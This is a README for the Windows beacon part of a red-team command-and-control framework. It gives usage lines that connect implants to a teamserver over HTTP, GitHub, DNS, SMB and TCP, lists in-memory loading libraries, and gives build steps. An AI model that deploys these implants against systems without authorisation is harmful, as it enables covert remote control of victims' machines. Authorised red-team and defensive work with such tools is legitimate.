Exploration is a lightweight, modular Command and Control (C2) framework designed for red team operations. This repository provides the Beacon component implemented in C++ for targeting Windows systems. The corresponding TeamServer and Client components are available in the C2TeamServer repository.
This project includes multiple Beacons capable of communicating with the TeamServer through a variety of channels. Supported communication methods include HTTP/HTTPS, GitHub, DNS, SMB, and TCP.
# HTTP/HTTPS
BeaconHttp.exe <TEAMSERVER_IP> <LISTENER_PORT> <http|https>
BeaconHttp.exe 10.10.10.10 8443 https
BeaconHttp.exe 10.10.10.10 8080 http
# GitHub
BeaconGithub.exe <GITHUB_USER/REPO> <ACCESS_TOKEN>
BeaconGithub.exe maxDcb/C2Implant ghp_dsfgdfhdf5554456g4fdg465...
# DNS
BeaconDns.exe <DNS_SERVER> <TEAMSERVER_DOMAIN>
BeaconDns.exe 8.8.8.8 bac.superdomain.com
# SMB
BeaconSmb.exe <LISTENER_IP> <PIPE_NAME>
BeaconSmb.exe 127.0.0.1 pipename
# TCP
BeaconTcp.exe <LISTENER_IP> <LISTENER_PORT>
BeaconTcp.exe 127.0.0.1 4444This project relies on several third-party libraries and tools:
- Donut: Generates shellcode from PE files.
- COFFLoader: Executes object files such as those in CS-Situational-Awareness-BOF.
- MemoryModule: Enables runtime DLL loading.
- UnmanagedPowerShell: Executes PowerShell from unmanaged code.
- cpp-base64: Base64 encoding/decoding.
- nlohmann/json: JSON parsing.
Install prerequisites:
- Chocolatey
- CMake:
choco install cmake --preInitialize submodules and set up the build directory:
git submodule update --init
mkdir buildWindows
cd buildWindowsUsing the "x64 Native Tools Command Prompt for VS":
# With tests and logging enabled:
cmake -G "Visual Studio 17 2022" -DWITH_TESTS=ON ..
# Without tests and logging:
cmake -G "Visual Studio 17 2022" ..
msbuild .\C2Implant.sln /property:Configuration=Release -mAlternatively, open the generated C2Implant.sln in Visual Studio and build in Release mode. Ensure the Runtime Library is set to Multi-threaded (/MT).
cmake -G "Visual Studio 17 2022" -A "Win32" ..
msbuild .\C2Implant.sln /property:Configuration=Release /p:Platform=Win32 -m- Compiled Beacons:
Release\Beacons - Compiled Module DLLs:
Release\Modules